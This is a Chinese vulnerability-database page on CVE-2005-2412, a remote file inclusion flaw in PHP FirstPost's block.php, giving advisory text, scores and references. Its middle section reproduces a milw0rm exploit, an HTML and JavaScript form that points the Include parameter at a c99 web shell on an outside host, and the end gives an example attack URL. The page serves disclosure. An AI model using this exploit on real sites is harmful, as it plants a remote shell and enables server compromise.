CVE-2005-2412
CVSS5.0
发布时间 :2005-08-03 00:00:00
修订时间 :2016-10-17 23:26:43
NMCOES    

[原文]PHP remote file inclusion vulnerability in block.php in PHP FirstPost allows remote attackers to execute arbitrary PHP code via the Include parameter.


[CNNVD]PHPFirstpost 'Block.PHP'远程文件包含漏洞 (CNNVD-200508-038)

        PHP FirstPost中的block.php文件存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于Internet参数执行任意的PHP代码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2412
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2412
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-038
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112230599222543&w=2
(UNKNOWN)  BUGTRAQ  20050724 PHP FirstPost remote file include vulnerability
http://securitytracker.com/id?1014563
(UNKNOWN)  SECTRACK  1014563
http://www.securityfocus.com/bid/14371
(UNKNOWN)  BID  14371
http://xforce.iss.net/xforce/xfdb/21513
(UNKNOWN)  XF  php-firstpost-block-file-include(21513)

- 漏洞信息

PHPFirstpost 'Block.PHP'远程文件包含漏洞
中危 输入验证
2005-08-03 00:00:00 2005-10-20 00:00:00
远程  
        PHP FirstPost中的block.php文件存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于Internet参数执行任意的PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (3906)

PHP FirstPost 0.1 (block.php Include) Remote File Inclusion Exploit (EDBID:3906)
php webapps
2007-05-12 Verified
0 Dj7xpl
N/A [点击下载]
<html>
<head>
<title>..:: PhpFirstPost blog   Remote File Include Exploit ::..</title>

<script language="JavaScript">

/*


        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal   :   PhpFirstPost 0.1
[!] Download :   http://sourceforge.net/projects/phpfirstpost/
[!] Type     :   Remote File Include Exploit

---------------------------------------------------------------------

*/

 var path="/"
 var adress="block.php?" 
 var include ="Include=" 
 var phpshell="http://dj7xpl.by.ru/shell/c99.php?" 

 function command(){
     if (document.rfi.target1.value==""){
        alert("Exploit Failed...");
    return false;
  }



rfi.action= document.rfi.target1.value+path+adress+include+phpshell;
rfi.submit(); 
 }
</script>

</head>

<body bgcolor="#198ccd">
<center>

<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
  <b><font face="batangche" size="3" color="white">Target:</font><font
face="Arial" size="2"
color="white">http://Target.ir/blog</font><br><br>
<font color="#00FF00"size="+1" face="batangche">
</font>
<font color="red" size="2"></font></b>
<input type="text" name="target1" size="20" style="background-color:
white" onmouseover="javascript:this.style.background='red';"
onmouseout="javascript:this.style.background='red';"></p>
<p>
<input type="submit" value="Go -->" name="B1">
<input type="reset" value="Clear" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes"
frameborder="0"></iframe>
</p><br><br>
<p><font color="red" size="2" face="batang">Dj7xpl @ Yahoo . com </font></p>
</center>
</body>
</html>

# milw0rm.com [2007-05-12]
		

- 漏洞信息

18394
PHP FirstPost block.php Include Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

PHP FirstPost contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to block.php not properly sanitizing user input supplied to the Include variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2005-07-24 Unknow
2005-07-24 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

PHPFirstpost Block.PHP Remote File Include Vulnerability
Input Validation Error 14371
Yes No
2005-07-25 12:00:00 2007-05-30 12:03:00
][GB][ and Zetha are credited for the discovery of this vulnerability.

- 受影响的程序版本

PhpFirstPost PhpFirstPost 0.1

- 漏洞讨论

Phpfirstpost is prone to a remote PHP file-include vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may exploit this issue to execute arbitrary PHP code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

- 漏洞利用

An exploit example has been provided:

http://www.example.com/block.php?Include=http://www.example.com/cmd.gif?&cmd=|command|

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站